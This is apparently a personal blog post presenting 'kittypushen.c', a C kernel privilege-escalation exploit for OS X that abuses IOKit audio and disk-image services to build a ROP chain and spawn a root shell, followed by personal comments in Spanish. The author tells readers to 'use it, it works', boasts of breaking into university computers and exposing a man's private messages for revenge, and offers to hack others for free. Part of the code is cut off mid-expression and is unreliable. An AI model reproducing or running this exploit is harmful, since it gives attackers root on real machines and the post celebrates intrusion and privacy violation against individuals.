kittypushen.c

Here you have one of my favorite guys… I developed it around 2 years ago, maybe.

The story is that I had a friend named SparkchicK and we traveled to Guadalajara to find his boyfriend, so I hacked a lot of computers in an university to found him. And.. I don’t know why at this university they have a OS X server, it’s so strange, I have never seen something like this, so I started to work using a public vulnerability and that’s all… this is my code, a privilege scalation exploit.. actually I can’t remember the CVE… hum…

Around a month ago… someone tell me bad things, and near to the birthday of his ex-girlfriend I looked to give her a little gift, all the conversations where «my friend» asked to other girls for nude photos and other things… yeah, I enjoyed a lot when she slapped him in public, but I enjoyed so much when I was drinking a great beer while he was crying and suffering because she reads all…

So… use it, it works.

And if you know a guy like «my friend» please tell me, I’ll hack him for free… I knew two persons who did me the same… so, for me will be a pleasure.

Well… here the code.

Cheers c[xxx]

 
<

#include
static uint64_t kslide=0;
#define ALLOCS 0x100
#import "import.h"
#import "lsym_gadgets.h"
static mach_port_t servicea = 0;
static mach_port_t servicex = 0;
__attribute__((always_inline)) inline
lsym_slidden_kern_pointer_t lsym_slide_pointer(lsym_kern_pointer_t pointer) {
if (!pointer) return pointer;
return (lsym_slidden_kern_pointer_t) pointer + kslide;
}

__attribute__((always_inline)) static inline
uint64_t alloc(uint32_t addr, uint32_t sz) {
vm_deallocate(mach_task_self(), (vm_address_t) addr, sz);
vm_allocate(mach_task_self(), (vm_address_t*)&addr, sz, 0);
while(sz--) *(char*)(addr+sz)=0;
return addr;
}
__attribute__((always_inline)) static inline
uint64_t leak_heap_ptr(io_connect_t* co) {
io_connect_t conn = MACH_PORT_NULL;
if(IOServiceOpen(servicea, mach_task_self(), 0, co) != KERN_SUCCESS) {
puts("failed");
exit(-20);
}
uint64_t scalarO_64=0;
uint32_t outputCount = 1;
IOConnectCallScalarMethod(*co, 2, NULL, 0, &scalarO_64, &outputCount);
if (!scalarO_64) {
puts("failed infoleaking");
exit(-20);
}
scalarO_64 <<= 8; scalarO_64 |= 0xffffff0000000000; return scalarO_64; } typedef struct { mach_msg_header_t header; mach_msg_body_t body; mach_msg_ool_descriptor_t desc; mach_msg_trailer_t trailer; } oolmsg_t; static uint16_t off_w = 0; __attribute__((always_inline)) static inline void or_everywhere(uint64_t add) { io_connect_t conn = MACH_PORT_NULL; IOServiceClose(0); // dyld fails when aslr = 0 & NULL page is mapped, so force this symbol into the plt IOServiceOpen(0,0,0,0); // dyld fails when aslr = 0 & NULL page is mapped, so force this symbol into the plt alloc(0, 0x1000); volatile uint64_t* mp = (uint64_t*) 0; if(!off_w) { while ((uint32_t)mp < 0xC00) { *mp=(uint64_t)0xC00; mp++; } IOServiceOpen(servicex, kIOMasterPortDefault, 0, &conn); IOServiceClose(conn); char* kp=(char*)0xC00; while ((uint32_t)kp < 0x1000) { if (*kp == 0x10) { break; } kp++; } if ((uint32_t)kp == 0x1000) { vm_deallocate(mach_task_self(), 0, 0x1000); puts("not vulnerable"); exit(-1); } mp=0; while ((uint32_t)mp < 0xC00) { *mp=(uint64_t)0xC00 - (uint32_t)(kp-0xC00); mp++; } IOServiceOpen(servicex, kIOMasterPortDefault, 0, &conn); IOServiceClose(conn); if (*((char*)0xC00)!=0x10) { vm_deallocate(mach_task_self(), 0, 0x1000); puts("wrong offset"); exit(-2); } off_w = (uint16_t) kp - 0xc00; } mp=0; while ((uint32_t)mp < 0xC00) { *mp=(uint64_t)(add - off_w); mp++; } IOServiceOpen(servicex, kIOMasterPortDefault, 0, &conn); vm_deallocate(mach_task_self(), 0, 0x1000); IOServiceClose(conn); } __attribute__((always_inline)) static inline void send_kern_data(char* vz, size_t svz, mach_port_t* msgp) { oolmsg_t *msg=calloc(sizeof(oolmsg_t)+0x2000,1); if(!*msgp){ mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, msgp); mach_port_insert_right(mach_task_self(), *msgp, *msgp, MACH_MSG_TYPE_MAKE_SEND); } bzero(msg,sizeof(oolmsg_t)); msg->header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
msg->header.msgh_bits |= MACH_MSGH_BITS_COMPLEX;
msg->header.msgh_remote_port = *msgp;
msg->header.msgh_local_port = MACH_PORT_NULL;
msg->header.msgh_size = sizeof(oolmsg_t);
msg->header.msgh_id = 1;
msg->body.msgh_descriptor_count = 1;
msg->desc.address = (void *)vz;
msg->desc.size = svz;
msg->desc.type = MACH_MSG_OOL_DESCRIPTOR;
mach_msg( (mach_msg_header_t *) msg, MACH_SEND_MSG, sizeof(oolmsg_t), 0, 0, 0, 0 );
free(msg);
}
__attribute__((always_inline)) static inline
char* read_kern_data(mach_port_t port) {
oolmsg_t *msg=calloc(sizeof(oolmsg_t)+0x2000,1);
bzero(msg,sizeof(oolmsg_t)+0x2000);
mach_msg((mach_msg_header_t *)msg, MACH_RCV_MSG, 0, sizeof(oolmsg_t)+0x2000, (port), 0, MACH_PORT_NULL);
return msg->desc.address;
}
int main(int argc, char** argv, char** envp){
if (getuid() == 0) {
execve("/bin/sh",((char* []){"/bin/sh",0}), envp);
exit(0);
}
if((int)main < 0x5000) execve(argv[0],argv,envp); lsym_map_t* mapping_kernel=lsym_map_file("/mach_kernel"); if (!mapping_kernel || !mapping_kernel->map) {
mapping_kernel=lsym_map_file("/System/Library/Kernels/kernel");
}
lsym_map_t* mapping_audio=lsym_map_file("/System/Library/Extensions/IOAudioFamily.kext/Contents/MacOS/IOAudioFamily");
kslide = kext_pointer("com.apple.iokit.IOAudioFamily") + RESOLVE_SYMBOL(mapping_audio, "__ZTV23IOAudioEngineUserClient") + 0x10;
sync();
kern_return_t err;
io_iterator_t iterator;
IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOHDIXController"), &iterator);
servicex = IOIteratorNext(iterator);
IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOAudioEngine"), &iterator);
servicea = IOIteratorNext(iterator);
uint64_t c = 0;
or_everywhere((uint64_t)&c);
if (c != 0x10) {
puts("not vulnerable");
return 2;
}
int ctr=0;
#define DO_TIMES(x) for(ctr=0;ctr__rop_chain;

or_everywhere(heap_info[1].kobject+0x220); // set online
or_everywhere(heap_info[1].kobject+0x208); // set userbuffer to 0x000000000010 (!= NULL)
alloc(0, 0x1000);
volatile uint64_t* mp = (uint64_t*) 0x10;
mp[0] = (uint64_t)0;
mp[1] = (uint64_t)vtable;
mp[2] = (uint64_t)&mp[1];
uint64_t xn = IOConnectRelease((io_connect_t )heap_info[1].connect); // running code!
vm_deallocate(mach_task_self(), 0, 0x1000);
setuid(0);
if (getuid() == 0) {
system("/bin/sh");
exit(0);
}

puts("didn't get root, but this system is vulnerable. ");
puts("kernel heap may be corrupted");
return 1;
}

11 comentarios en “kittypushen.cAñade los tuyos →

  1. 🙁

    No es gracioso que hagas esto

    que tienes????

    cuentame???

    cuando vienes???

    tu no eres asi

    estas haciendo cosas que no debes
    tu no eres asi

    que tienes nanito???!!!!

    tu eres diferente
    eres mejor que toda esa gente con la que te estas metiendo

    tu no eres un wey malo

  2. Vendetta the selfish one… 

    Supongo fuiste un cobarde y nunca fuiste a verla, a pesar de tantas veces que te mostré que ella te leía y quería saber de ti. Estúpido.

    Volverás a ser lo que eras, y desde que te vi con la chimba aquella dejaste de serlo. Eres un estúpido Vendetta, eras feliz y volviste a ser el bacano que conocí… presumido, con mucho talento, más talento del que hackers más famosos que tu tienen, pero que jamás creció, pudiste ser feliz.

    Tu no sirves para esta vaina, que estúpido eres de verdad, que quieres? ser el siguiente en un periodicaso de tu pais? tu eras más que esto.

    Cambiaste por ella, te volviste tan bueno en todos aspectos por ella, y ahora estas peor que antes. Cuidate, ya las policias y las leyes no son como cuando fuimos hackers jugando con servidores, y tu tienes mucha cola que pisar Lucifer.

    Besos sabor arequipe cariño mio.

      1. Cuidate mucho querido, no eres el mismo que crees, no eres tan malo como crees y ya tampoco eres tan bueno maricon.

        La vida te trato de forma injusta, se que no olvidaras tu enojo contra la vida, pero cuidate. Eres grande Vendetta, me encantaria decirte quien soy y sabras que soy una de esas personas que te deben todo, gracias a ti yo tengo mi libertad, eres una gran bocabo, alegre, risa facil, inteligente como nadie, talentoso, y tienes un corazon enorme.

        Debiste ir por ella, deberias ir por ella, nadie podria olvidarte jamas, estoy segura querido.

        Cuidate mexican hacker wannabe, eres un humano enorme.

        Besos dulces de arequipe querido mio.

        1. Nat siempre he sabido que eres tú.. (>´_´)>

          Ella me odia, jamás querría verme.

          Relaaaaaaaaaajate, tratas con el gran, el único, el imabatible, el incomparable, el sin igual vendetta B\

    1. Hum… sincerely I took a well known address and create the frame on it. I think it doesn’t work in all the cases, but until now I have exploited successfully all the targets I had.

      1. cool! not so elegant, but nice work!

        I hope to see you next DEFCON I have read about your work on shellcoding I want to share with you some of muy pocs, current all for private customers, but maybe you could be interested in share

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *